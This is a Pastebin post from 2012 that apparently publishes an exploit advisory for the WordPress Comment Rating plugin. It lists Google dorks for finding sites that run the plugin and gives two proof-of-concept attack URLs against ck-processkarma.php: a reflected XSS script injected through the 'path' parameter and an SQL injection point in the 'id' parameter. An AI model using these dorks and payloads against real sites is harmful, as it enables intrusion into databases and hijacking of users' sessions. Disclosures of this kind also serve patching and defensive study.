Advertisement
moften

Wordpress comment rating plugin multiple Vulnerabilities

Jan 4th, 2012
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1. # Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
  2. # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
  3. # 2- inurl:"/ck-processkarma.php?id="
  4. # Date: 2/1/2012
  5. # Author: The Evil Thinker
  6. # Contact : Enstene156@hotmail.fr
  7. # Software Link: www.wordpress.com
  8. # Vulnerable plugin: Comment rating plugin
  9. # Tested on: Linux
  10.  
  11. Details :
  12. ---------
  13.  
  14. the vulnerable file is "ck-processkarma.php"
  15. the script doesn't filter the input parameters (id "sql", path "XSS")
  16.  
  17. Poc 1 (XSS) :
  18.  
  19. http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
  20.  
  21.  
  22. Poc 2 (SQL injection) :
  23.  
  24. http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
  25.  
  26. -------------------------------------------------------------------------------------------
  27.  
  28. Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement